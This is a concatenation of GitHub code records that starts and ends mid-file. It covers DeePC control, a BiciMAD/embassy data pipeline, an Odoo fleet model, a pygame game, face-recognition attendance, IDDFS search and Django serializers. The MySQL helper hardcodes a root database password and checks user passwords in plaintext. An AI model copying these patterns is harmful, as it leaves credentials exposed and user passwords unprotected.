1)],[u_seq[:,-1].reshape(m, 1)]])\n # BB = np.block([[BB],[BB]])\n # print(BB)\n \n # Set up DeePC problem\n \n\n \n \n \n # Plot system evolution\n # time = np.linspace(0,t_step,n_sim+1)\n # plt.plot(time,xLog[2,:])\n # plt.show()","repo_name":"pSujet/DeepC","sub_path":"main_deepc_old.py","file_name":"main_deepc_old.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"553856059","text":"# -*- coding: utf-8 -*-\n\nclass Catalogo():\n\n\tdef abrirArquivo(self, nome):\n\t\tcaminhoDaTabela = 't/'+nome+'.txt'\n\t\treturn caminhoDaTabela\n\n\tdef leitura(self, nome):\n\t\tobjeto = self.abrirArquivo(nome)\n\t\twith open(objeto) as entrada:\n\t\t\tlinhas = entrada.read().splitlines()\n\t\treturn linhas\n\t\t\n\tdef definirArquivo(self, arquivo, index): \n\t\tif arquivo == 'Alunos': # id, curso_id, matricula, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telif index == 'curso_id': \n\t\t\t\treturn 1 \n\t\t\telif index == 'matricula': \n\t\t\t\treturn 2 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 3 \n\t\t\n\t\tif arquivo == 'Disciplinas': # id, nome, curso_id \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telif index == 'nome': \n\t\t\t\treturn 1 \n\t\t\telse: # index == 'curso_id': \n\t\t\t\treturn 2 \n\n\t\tif arquivo == 'DisciplinaHistorico': # id, aluno_id, disciplina_id, nota, ano, periodo, situacao \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telif index == 'aluno_id': \n\t\t\t\treturn 1 \n\t\t\telif index == 'disciplina_id': \n\t\t\t\treturn 2 \n\t\t\telif index == 'nota': \n\t\t\t\treturn 3 \n\t\t\telif index == 'ano': \n\t\t\t\treturn 4 \n\t\t\telif index == 'periodo': \n\t\t\t\treturn 5 \n\t\t\telse: # index == ' situacao': \n\t\t\t\treturn 6 \n\n\t\tif arquivo == 'Cursos': # id, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 1 \n\n\t\tif arquivo == 'mergesorted': # id, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 1 \n\t\t\t\t\n\t\tif arquivo == 'hash': # id, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 1 \n\t\tif arquivo == 'nested': # id, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 1\n\t\tif arquivo == 'selecao': # id, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 1 \n\t\tif arquivo == 'projecao': # id, nome \n\t\t\tif index == 'id': \n\t\t\t\treturn 0 \n\t\t\telse: # index == 'nome': \n\t\t\t\treturn 1 \t\t\t\t \t\t\t\t\t\t\n\t\n\tdef definirTamanho(self, nome):\n\t\tif nome == 'Alunos':\n\t\t\ttamanho = 2000\n\t\telif nome == 'Cursos':\n\t\t\ttamanho = 7\n\t\telif nome == 'Disciplinas':\n\t\t\ttamanho = 303\n\t\telse:\n\t\t\ttamanho = 15000\n\t\treturn tamanho\n\n\tdef indiceOrdenado(self, x):\n\t\treturn {\n\t\t\t'1': 308,\n\t\t\t'2': 581,\n\t\t\t'3': 853, \n\t\t\t'4': 1153,\n\t\t\t'5': 1452,\n\t\t\t'6': 1721\n\t\t}.get(x, 2000)\n\t\t\n","repo_name":"CrazyRural/AtividadesAcademicas","sub_path":"AA-EDII/catalogo.py","file_name":"catalogo.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34000533360","text":"import requests\n\nurl = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/91.0.4472.101 Safari/537.36 '\n}\nfor page in range(1, 10):\n data = {\n 'cname': '',\n 'pid': '',\n 'keyword': '上海',\n 'pageIndex': str(page),\n 'pageSize': '10'\n }\n resp = requests.post(url=url, headers=headers, data=data)\n page_json = resp.json()\n for dic in page_json['Table1']:\n store_name = dic['storeName']\n addr = dic['addressDetail']\n print(store_name,addr)\n\n\n\n","repo_name":"284497478/pythonProject","sub_path":"testPython/request_demo_kfc.py","file_name":"request_demo_kfc.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8384069456","text":"\n\n#import libraries\n\nimport pandas as pd\nfrom bicimad_refact import bicimad_refact as br\nfrom embajadas_refact import embajadas_refact as er \nfrom embajadas_bicimad_refact import embajadas_bicimad_refact as ebr\nimport os\nfrom dotenv import load_dotenv\nfrom api_bicimad import api_bicimad_refact as ab\n\n#BICIMAD STATIONS\n#PARAMETERS\n#connection string in order to connect to api de BiciMad\npath_api = 'https://openapi.emtmadrid.es/v1/mobilitylabs/user/login/'\nenv_file = '.env'\npath_data_stations = 'https://openapi.emtmadrid.es/v1/transport/bicimad/stations'\nname_stations = []\nbicis = []\n\n#EMBAJADAS\n#PARAMETERS\n\npath_embajadas = 'https://datos.madrid.es/egob/catalogo/201000-0-embajadas-consulados.json'\nnombre_columna = 'location.latitude'\nnuevo_nombre_columna = 'latitude'\nnombre_columna_2 = 'location.longitude'\nnuevo_nombre_columna_2 = 'longitud'\npath_directory_embajadas = './files/df_consulados_embajadas.csv'\n\n\n#EMBAJADAS VS BICIMAD\n#PARAMETERS\n\n#df_consulados_embajadas = pd.read_csv('/Users/guillaumedieude/Desktop/Ironhack/proyecto_m1/m1_proyect/for_developers/CSVs/df_consulados_embajadas.csv')\n#df_bicimad = pd.read_csv('/Users/guillaumedieude/Desktop/Ironhack/proyecto_m1/m1_proyect/for_developers/CSVs/df_bicimad.csv')\n\ntype_of_place = \"embajada/consulado\"\n\ndistances = []\ndistances_sorted=[]\ndistances_index = []\nbicimad_stations = []\naddress_bicimad_stations = []\ndistances_final = []\nbicimad_stations_final = []\naddresses_bicimad_stations_final = []\n\n\npath_save_file = './files/df_embajadas_bicimad.csv'\n\n\n\nif __name__ == \"__main__\":\n print(\"pipeline started\")\n load_dotenv('.env')\n token = os.environ.get(\"token\")\n #APLICACION FUNCIONES BICIMAD_REFACT\n #creation del objeto engine para acceder a datos de BiciMad\n connection_string = 'mysql+pymysql://ironhack_user:' + token + '@173.201.189.217/BiciMAD'\n engine = br.engine(connection_string)\n print(\"engine created\")\n #guardamos en un df los datos de Bicimad\n df_bicimad = pd.read_sql_query(\"SELECT * FROM bicimad_stations\", engine)\n print(\"df_bicimad created\")\n #Creación dataframe y aplicación de las funciones de transformación al dataframe df_bicimad\n df_bicimad['longitude'] = df_bicimad.apply(lambda x: br.latitudes(x['geometry.coordinates']), axis=1 )\n df_bicimad['latitude'] = df_bicimad.apply(lambda x: br.longitudes(x['geometry.coordinates']), axis=1 )\n print(\"df_bicimad modified\")\n #Reducción del dataframe para quedarnos solo con lo que nos interesa\n df_bicimad = df_bicimad[['name', 'address', 'latitude','longitude']]\n print(\"df_bicimad reduced\")\n #Descarga del dataframe a csv\n df_bicimad.to_csv(\"./files/df_bicimad.csv\")\n print(\"df_bicimad saved\")\n #APLICACION FUNCIONES EMBAJADAS_REFACT\n df_consulados_embajadas = er.df_embajadas(path_embajadas)\n print(\"df_consulados_embajadas created\")\n #Renombramos columnas que representan la latitud y la longitud\n df_consulados_embajadas = er.clean_df_embajadas(df_consulados_embajadas, nombre_columna,nuevo_nombre_columna,nombre_columna_2, nuevo_nombre_columna_2)\n print(\"df_consulados_embajadas cleaned\")\n #Reducimos el dataframe a las columnas que nos interesan\n df_consulados_embajadas = er.df_embajadas_reducido(df_consulados_embajadas)\n print(\"df_consulados_embajadas reduced\")\n #Quitamos líneas que tienen como valor nulo la latitud o longitud\n df_consulados_embajadas = er.dropna_embajadas(df_consulados_embajadas)\n print(\"df_consulados_embajadas sin na\")\n #Descarga del dataframe a csv\n df_consulados_embajadas_saved = er.descargar_embajadas(df_consulados_embajadas, path_directory_embajadas)\n print(\"df_consulados_embajadas saved\")\n #APLICACION FUNCIONES EMBAJADAS_BICIMAD_REFACT\n #Creamos las listas que nos van a permitir crear nuestro dataframe final\n #Para Bicimad\n bicimad_longitudes = ebr.listas_bicimad_longitudes(df_bicimad)\n bicimad_station_name = ebr.listas_bicimad_station_names(df_bicimad)\n bicimad_station_address = ebr.listas_bicimad_addresses(df_bicimad)\n bicimad_latitudes = ebr.listas_bicimad_latitudes(df_bicimad)\n print(\"lists bicimad created\")\n #Para embajadas y consulados\n consulados_embajadas_latitudes = ebr.embajadas_latitudes(df_consulados_embajadas)\n consulados_embajadas_longitudes = ebr.embajadas_longitudes(df_consulados_embajadas)\n place_of_interest = ebr.embajadas_titles(df_consulados_embajadas)\n type_of_place = ebr.embajadas_type(type_of_place, place_of_interest)\n place_address = ebr.embajadas_address(df_consulados_embajadas)\n print(\"lists embassy created\")\n #función de creación de listas con resultado bicimad más próximo por cada embajada consulado\n print(\"creación empezada\")\n a, b = ebr.creacion(consulados_embajadas_latitudes, consulados_embajadas_longitudes,bicimad_latitudes, bicimad_longitudes, df_bicimad, distances_final, addresses_bicimad_stations_final, bicimad_stations_final)\n #distances_final = a\n addresses_bicimad_stations_final = a\n bicimad_stations_final = b\n #Juntamos las columnas en un mismo dataframe para tener\n dataframe_embajadas_bicimad = ebr.dataframe(place_of_interest, type_of_place, place_address, bicimad_stations_final, addresses_bicimad_stations_final)\n print(\"dataframe correctamente creado\")\n #CONEXIÓN A API\n print('connecting to bicimad api')\n #email para conexión\n email = ab.email(env_file)\n #password para conexión\n password = ab.password(env_file)\n #conexión a api\n json_api_data = ab.api_bicimad_connection(path_api, email, password)\n print('conection to api OK')\n #access token obtention\n access_token = ab.access_token(json_api_data)\n print('access token correctly retrieved')\n #obtención datos api stations\n json_data_stations = ab.get_data_stations(path_data_stations, access_token)\n print('stations data available')\n #creación listas para dataframe bicis\n a, b = ab.data_bicis_stations(name_stations, bicis, json_data_stations)\n name_stations = a\n bicis = b\n print('lists from stations data created')\n #creación dataframe bicis real time\n dataframe_bicis = ab.dataframe_bicis(name_stations, bicis)\n print('bicis dataframe created')\n #merge con dataframe embajadas bicimad\n dataframe_result = ab.dataframe_bicis_merged(dataframe_embajadas_bicimad, dataframe_bicis)\n print('dataframes merged')\n #Descarga del dataframe a csv\n save_dataframe = ebr.save(dataframe_result, path_save_file)\n print(\"result saved\")","repo_name":"guiston04/m1_proyect","sub_path":"for_developers/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40460909897","text":"from odoo import api, fields, models, tools\n\n\nclass FleetBookingLine(models.Model):\n \"\"\"Model that handles the fleet booking\"\"\"\n _name = \"fleet.booking.line\"\n _description = \"Hotel Fleet Line\"\n _rec_name = 'fleet_id'\n\n @tools.ormcache()\n def _get_default_uom_id(self):\n \"\"\"Method for getting the default uom id\"\"\"\n return self.env.ref('uom.product_uom_km')\n\n booking_id = fields.Many2one(\"room.booking\", string=\"Booking\",\n ondelete=\"cascade\",\n help=\"Shows the room Booking\")\n fleet_id = fields.Many2one('fleet.vehicle.model',\n string=\"Vehicle\",\n help='Indicates the Vehicle')\n description = fields.Char(string='Description',\n related='fleet_id.display_name',\n help=\"Description of Vehicle\")\n uom_qty = fields.Float(string=\"Total KM\", default=1,\n help=\"The quantity converted into the UoM used by \"\n \"the product\")\n uom_id = fields.Many2one('uom.uom', readonly=True,\n string=\"Unit of Measure\",\n default=_get_default_uom_id, help=\"This will set \"\n \"the unit of\"\n \" measure used\")\n price_unit = fields.Float(string='Rent/KM', related='fleet_id.price_per_km',\n digits='Product Price',\n help=\"The rent/km of the selected fleet.\")\n tax_ids = fields.Many2many('account.tax',\n 'hotel_fleet_order_line_taxes_rel',\n 'fleet_id',\n 'tax_id', string='Taxes',\n help=\"Default taxes used when renting the fleet \"\n \"models.\",\n domain=[('type_tax_use', '=', 'sale')])\n currency_id = fields.Many2one(\n related='booking_id.pricelist_id.currency_id',\n string=\"Currency\",\n help='The currency used')\n price_subtotal = fields.Float(\n string=\"Subtotal\",\n compute='_compute_price_subtotal', help=\"Total price excluding tax\",\n store=True)\n price_tax = fields.Float(\n string=\"Total Tax\",\n compute='_compute_price_subtotal', help=\"Total tax amount\",\n store=True)\n price_total = fields.Float(\n string=\"Total\",\n compute='_compute_price_subtotal',\n help=\"Total Price Including Tax\",\n store=True)\n state = fields.Selection(\n related='booking_id.state',\n string=\"Order Status\",\n help=\" Status of the Order\",\n copy=False)\n\n @api.depends('uom_qty', 'price_unit', 'tax_ids')\n def _compute_price_subtotal(self):\n \"\"\"\n Compute the amounts of the room booking line.\n \"\"\"\n for line in self:\n tax_results = self.env['account.tax']._compute_taxes(\n [line._convert_to_tax_base_line_dict()])\n totals = list(tax_results['totals'].values())[0]\n amount_untaxed = totals['amount_untaxed']\n amount_tax = totals['amount_tax']\n line.update({\n 'price_subtotal': amount_untaxed,\n 'price_tax': amount_tax,\n 'price_total': amount_untaxed + amount_tax,\n })\n if self.env.context.get('import_file',\n False) and not self.env.user. \\\n user_has_groups('account.group_account_manager'):\n line.tax_id.invalidate_recordset(\n ['invoice_repartition_line_ids'])\n\n def _convert_to_tax_base_line_dict(self):\n \"\"\" Convert the current record to a dictionary in order to use the\n generic taxes computation method\n defined on account.tax.\n :return: A python dictionary.\n \"\"\"\n self.ensure_one()\n return self.env['account.tax']._convert_to_tax_base_line_dict(\n self,\n partner=self.booking_id.partner_id,\n currency=self.currency_id,\n taxes=self.tax_ids,\n price_unit=self.price_unit,\n quantity=self.uom_qty,\n price_subtotal=self.price_subtotal,\n )\n\n def search_available_vehicle(self):\n \"\"\"Returns list of booked vehicles\"\"\"\n return (self.env['fleet.vehicle.model'].search(\n [('id', 'in', self.search([]).mapped('fleet_id').ids)]).ids)\n","repo_name":"CybroOdoo/CybroAddons","sub_path":"hotel_management_odoo/models/fleet_booking_line.py","file_name":"fleet_booking_line.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"52"} +{"seq_id":"3286793926","text":"import sys\nimport time\n\nimport pygame\n\nfrom src.components.game_status import GameStatus\nfrom src.components.hand import Hand\nfrom src.components.hand_side import HandSide\nfrom src.components.player import Player\nfrom src.components.scoreboard import Scoreboard\nfrom src.global_state import GlobalState\nfrom src.services.music_service import MusicService\nfrom src.services.visualization_service import VisualizationService\nfrom src.utils.tools import update_background_using_scroll, update_press_key, is_close_app_event\n\nGlobalState.load_main_screen()\nVisualizationService.load_main_game_displays()\n\nscoreboard = Scoreboard()\n\n# Sprite Setup\nP1 = Player()\nH1 = Hand(HandSide.RIGHT)\nH2 = Hand(HandSide.LEFT)\n\n# Sprite Groups\nhands = pygame.sprite.Group()\nhands.add(H1)\nhands.add(H2)\nall_sprites = pygame.sprite.Group()\nall_sprites.add(P1)\nall_sprites.add(H1)\nall_sprites.add(H2)\n\n\ndef main_menu_phase():\n scoreboard.reset_current_score()\n\n events = pygame.event.get()\n\n for event in events:\n if is_close_app_event(event):\n GlobalState.GAME_STATE = GameStatus.GAME_END\n return\n\n if event.type == pygame.KEYDOWN:\n GlobalState.GAME_STATE = GameStatus.GAMEPLAY\n\n GlobalState.SCROLL = update_background_using_scroll(GlobalState.SCROLL)\n VisualizationService.draw_background_with_scroll(GlobalState.SCREEN, GlobalState.SCROLL)\n GlobalState.PRESS_Y = update_press_key(GlobalState.PRESS_Y)\n VisualizationService.draw_main_menu(GlobalState.SCREEN, scoreboard.get_max_score(), GlobalState.PRESS_Y)\n\n\ndef gameplay_phase():\n events = pygame.event.get()\n\n for event in events:\n if is_close_app_event(event):\n game_over()\n return\n\n P1.update()\n H1.move(scoreboard, P1.player_position)\n H2.move(scoreboard, P1.player_position)\n\n GlobalState.SCROLL = update_background_using_scroll(GlobalState.SCROLL)\n VisualizationService.draw_background_with_scroll(GlobalState.SCREEN, GlobalState.SCROLL)\n\n P1.draw(GlobalState.SCREEN)\n H1.draw(GlobalState.SCREEN)\n H2.draw(GlobalState.SCREEN)\n scoreboard.draw(GlobalState.SCREEN)\n\n if pygame.sprite.spritecollide(P1, hands, False, pygame.sprite.collide_mask):\n scoreboard.update_max_score()\n MusicService.play_slap_sound()\n time.sleep(0.5)\n game_over()\n\n\ndef exit_game_phase():\n pygame.quit()\n sys.exit()\n\n\ndef game_over():\n P1.reset()\n H1.reset()\n H2.reset()\n GlobalState.GAME_STATE = GameStatus.MAIN_MENU\n time.sleep(0.5)\n","repo_name":"Gooodgis/dont-touch-my-presents","sub_path":"src/game_phases.py","file_name":"game_phases.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"52"} +{"seq_id":"29061413508","text":"#Start Library\r\nfrom importlib.resources import path\r\nimport cv2\r\nimport face_recognition\r\nimport numpy as np\r\nimport os\r\nfrom datetime import datetime\r\n#End Library\r\n\r\n#Start Pengenalan data wajah\r\npath=\"data\"\r\nimages=[]\r\nname=[]\r\nmyList=os.listdir(path)\r\nprint(\"\\nLoading....\\n\")\r\n#print(myList)\r\nfor person in myList:\r\n Image=cv2.imread(f\"{path}/{person}\")\r\n #cv2.imshow(\"Foto\",Image)\r\n #cv2.waitKey(0)\r\n images.append(Image)\r\n name.append(os.path.splitext(person)[0])\r\n#print(images)\r\n#print(name)\r\n#End Pengenalan data wajah\r\n\r\n#Start Training Wajah\r\ndef findEncodings(images):\r\n encodeList=[]\r\n #Perulangan untuk mengambil data wajah\r\n for img in images:\r\n img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n encode=face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode)\r\n return encodeList\r\n\r\nencodeKnownImage=findEncodings(images)\r\n#print(encodeKnownImage)\r\nprint(\"\\nPresensi Berhasil Dijalankan....\\n\")\r\n#End Training Wajah\r\n\r\n#Start Reporting / Laporan presensi\r\ndef markAttendance(name):\r\n with open('laporan.csv','r+') as f:\r\n myDataList=f.readlines()\r\n nameList=[]\r\n for line in myDataList:\r\n entry=line.split(',')\r\n nameList.append(entry[0])\r\n if name not in nameList:\r\n now=datetime.now()\r\n dtString=now.strftime('%H:%M:%S')\r\n dtTanggal=now.strftime('%Y-%b-%d')\r\n f.writelines(f'\\n{name},{dtString},{dtTanggal}')\r\n#End Reporting / Laporan presensi\r\n\r\n#Start Akses Webcam dan Identifikasi Wajah\r\ncap=cv2.VideoCapture(0)\r\n#cap.set(3,1080)\r\n#cap.set(4,580)\r\nwhile True:\r\n succes,img=cap.read()\r\n imgS=cv2.resize(img,(0,0),None,0.25,0.25)\r\n imgS=cv2.cvtColor(imgS,cv2.COLOR_BGR2RGB)\r\n facescurFrame=face_recognition.face_locations(imgS)\r\n encodecurFrame=face_recognition.face_encodings(imgS,facescurFrame)\r\n for encodeFace,FaceLoc in zip(encodecurFrame,facescurFrame):\r\n #Start Face Recognition\r\n matches=face_recognition.compare_faces(encodeKnownImage,encodeFace)\r\n #name=\"Unknown\"\r\n faceDis=face_recognition.face_distance(encodeKnownImage,encodeFace)\r\n #print(faceDis)\r\n matchIndex=np.argmin(faceDis)\r\n if matches[matchIndex]:\r\n #name=name[matchIndex]\r\n Identity=name[matchIndex]\r\n #else:\r\n #name=\"Unknown\"\r\n # print(Identity)\r\n #End Face Recognition\r\n \r\n #print(FaceLoc)\r\n y1,x2,y2,x1=FaceLoc\r\n y1, x2, y2, x1=y1*4,x2*4,y2*4,x1*4\r\n #Bounding Box\r\n cv2.rectangle(img,(x1,y1),(x2,y2),(0,255,0),3)\r\n #Start Nama User\r\n cv2.rectangle(img,(x1,y2-35),(x2,y2),(0,255,0),2,cv2.FILLED)\r\n cv2.putText(img,Identity,(x1+6,y2-6),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,255),2)\r\n #Data User Di Laporan\r\n markAttendance(Identity)\r\n #End Nama User \r\n#End Akses Webcam dan Identifikasi Wajah\r\n cv2.imshow(\"Presensi Face Recogniton Untuk Siswa\",img)\r\n #cv2.waitKey(1)\r\n #=========================================\r\n #if cv2.waitKey(0) & 0xFF ==ord('k'):\r\n # break\r\n #cap.release()\r\n #cv2.destroyAllWindows()\r\n #=========================================\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27: # tekan 'ESC' buat keluar\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n#'''\r\n#End Akses Webcam\r\n\r\n#Jika data user tidak ada di data base, maka user tidak dapat melakukan presensi \r\n# atau tidak muncul rectangle di wajah user\r\n","repo_name":"Fauzan-Kamil/presenface-recog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3946204301","text":"import json\n\nimport pymysql\n\n\nclass sqlUtils:\n @classmethod\n # 初始化连接\n def initDB(cls):\n # 打开数据库连接\n config = {\n \"user\": \"root\",\n \"password\": \"xilan666\",\n \"host\": \"localhost\",\n \"database\": \"face-identify\"\n }\n db = pymysql.connect(**config)\n return db\n\n @classmethod\n # 登录\n def Login(cls, args):\n # 获取数据库连接\n db = sqlUtils.initDB()\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # sql语句\n sql = \"select * from user where user.username = %s and user.password = %s\"\n result = cursor.execute(sql, args)\n user = cursor.fetchone()\n db.commit()\n db.close()\n return result, user\n\n @classmethod\n # 注册\n def register(cls, args):\n # 获取数据库连接\n db = sqlUtils.initDB()\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # sql语句\n sql = \"insert into user(username,password) values (%s, %s)\"\n result = cursor.execute(sql, args)\n db.commit()\n db.close()\n return result\n\n @classmethod\n # 保存photo和name\n def save_photo_name(cls, base64_str, userId, name):\n db = sqlUtils.initDB()\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # 插入\n sql = \"UPDATE user set photo = %s,name = %s WHERE id = %s\"\n val = (base64_str, name, userId)\n try:\n cursor.execute(sql, val)\n db.commit()\n db.close()\n return True # 返回保存成功\n except:\n db.rollback()\n db.close()\n return False # 返回保存失败\n\n @classmethod\n # 根据id查询用户的 信息 主要是为了更新UserHolder\n def update_userHolder(cls, args):\n # 获取数据库连接\n db = sqlUtils.initDB()\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # sql语句\n sql = \"SELECT * FROM user WHERE id = %s\"\n result = cursor.execute(sql, args)\n now_user = cursor.fetchone()\n db.commit()\n db.close()\n return result, now_user\n\n @classmethod\n # 查询用户名与其对应的人脸数据\n def search_face_information(cls):\n # 获取数据库连接\n db = sqlUtils.initDB()\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # sql语句\n result = {}\n with db.cursor() as cursor:\n # 查询 user 表中的所有记录\n sql = \"SELECT username, name, photo FROM user\"\n cursor.execute(sql)\n rows = cursor.fetchall()\n\n # 遍历查询结果,将数据存储到 result 字典中\n for row in rows:\n username, name, photo = row\n if photo is None:\n photo = 'None'\n\n # 将数据存储到 result 字典中\n result[username] = [username, name, photo]\n\n db.commit()\n db.close()\n # 将 result 字典转换为 JSON 字符串,并返回\n return json.dumps(result)\n\n\nif __name__ == '__main__':\n print(sqlUtils.change_table(\"matter\", \"specs\", \"99x99\", \"1\"))\n","repo_name":"HYBBWuXiDiXi/YOLO-Mask-dection-and-identity-authentication","sub_path":"Qt/sqlUtils.py","file_name":"sqlUtils.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12374547361","text":"graph = {\n 'J':['I','E','K'],\n 'I':['C','A'],\n 'E':['A','L'],\n 'K':['E','L'],\n 'C':['B','D'],\n 'A':['D','O'],\n 'L':['O'],\n 'B':['G'],\n 'D':['F','M','O'],\n 'O':['M'],\n 'G':['C','D','H'],\n 'F':['G','H'],\n 'M':['N'],\n 'H':['N'],\n 'N':[]\n}\ndef DLS(start,goal,path,level,maxD):\n print('nCurrent level-->',level)\n path.append(start)\n if start == goal:\n print(\"Goal test successful\")\n return path\n print('Goal node testing failed')\n if level==maxD:\n return False\n print('nExpanding the current node',start)\n for child in graph[start]:\n if DLS(child,goal,path,level+1,maxD):\n return path\n path.pop()\n return False\nstart = 'J'\ngoal = input('Enter the goal node:-')\nmaxD = int(input(\"Enter the maximum depth limit:-\"))\nprint()\npath = list()\nres = DLS(start,goal,path,0,maxD)\nif(res):\n print(\"Path to goal node available\")\n print(\"Path\",path)\nelse:\n print(\"No path available for the goal node in given depth limit\")","repo_name":"trevor-ngugi/search_algorithims_python","sub_path":"IDDFS.py","file_name":"IDDFS.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9280447405","text":"medida = float(input('Uma distância em metro:'))\r\ncm = medida * 100\r\nmm = medida * 1000\r\ndc = medida * 10000\r\nnn = medida * 100000\r\nprint ('A medida de {:.0f}m corresponde a:\\n{:.0f}cm\\n{:.0f}mm\\n{:.0f}dc\\n{:.0f}nn'.format(medida, cm, mm, dc, nn))\r\nprint('desafio converta uma medida de metros em decamentros, nanometros, etc.')\r\n\r\n\r\n\r\n","repo_name":"DiegoFernandesQA/Python-Codes","sub_path":"Exercícios/Exercicio_08.py","file_name":"Exercicio_08.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6129257840","text":"# https://www.acmicpc.net/problem/1316\n\n#단어 갯수만큼 반복한다\n#단어를 입력\n#현재 위치의 알파벳과 다음 위치의 알파벳이 다르면\n#지금 위치의 알파벳이 뒤로 똑같은 알파벳 있으면 총 단어의 개수에서 1을 뺌\n\n\n\nn = int(input())\n\nfor _ in range(n):\n word = input()\n \n for i in range(len(word)-1):\n if word[i] != word[i+1]:\n if word[i] in word[i+1:]:\n n = n-1\n break\nprint(n)\n","repo_name":"hyperminji/algorithm","sub_path":"baekjoon/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10445015828","text":"from typing import List\n\nfrom django.core.exceptions import ValidationError\nfrom rest_framework import serializers\n\nfrom apps.participants.models.enums import ParticipantType\nfrom apps.participants.serializers import VisumParticipantSerializer\n\nfrom apps.locations.serializers import LinkedLocationSerializer\n\nfrom apps.visums.models import (\n LinkedCheck,\n LinkedSimpleCheck,\n LinkedDateCheck,\n LinkedDurationCheck,\n LinkedLocationCheck,\n LinkedParticipantCheck,\n LinkedFileUploadCheck,\n LinkedCommentCheck,\n LinkedNumberCheck,\n)\nfrom apps.visums.models.enums import CheckState\nfrom apps.visums.serializers import CheckSerializer\n\nfrom scouts_auth.groupadmin.models import ScoutsGroup\nfrom scouts_auth.scouts.permissions import CustomPermissionHelper\nfrom scouts_auth.inuits.serializers import PersistedFileSerializer\nfrom scouts_auth.inuits.serializers.fields import (\n DatetypeAwareDateSerializerField,\n RequiredCharSerializerField,\n OptionalCharSerializerField,\n OptionalIntegerSerializerField,\n)\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass LinkedCheckEndpointFactory:\n @staticmethod\n def get_endpoint(endpoint: str):\n return \"checks/{}\".format(endpoint)\n\n\nclass LinkedCheckSerializer(serializers.ModelSerializer):\n\n parent = CheckSerializer()\n endpoint = serializers.SerializerMethodField()\n value = serializers.SerializerMethodField()\n state = serializers.SerializerMethodField()\n _state = CheckState.UNCHECKED\n\n class Meta:\n model = LinkedCheck\n exclude = [\"sub_category\"]\n\n def get_endpoint(self, obj: LinkedCheck):\n return LinkedCheckEndpointFactory.get_endpoint(\n \"{}/{}\".format(obj.parent.check_type.endpoint_route, obj.id)\n )\n\n def get_value(self, obj: LinkedCheck):\n # logger.debug(\"Getting value for %s with id %s\", type(obj).__name__, obj.id)\n check: LinkedCheck = obj.get_value_type()\n\n permission_granted = True if (\n not obj.parent.requires_permission\n or CustomPermissionHelper.has_required_permission(\n request=self.context['request'],\n group_admin_id=obj.sub_category.category.category_set.visum.group,\n permission=obj.parent.requires_permission\n )\n ) else False\n\n if check.parent.check_type.is_simple_check():\n value = LinkedSimpleCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_date_check():\n value = LinkedDateCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_duration_check():\n value = LinkedDurationCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_location_check():\n value = LinkedLocationCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_camp_location_check():\n value = LinkedCampLocationCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_participant_member_check():\n value = LinkedParticipantMemberCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_participant_cook_check():\n value = 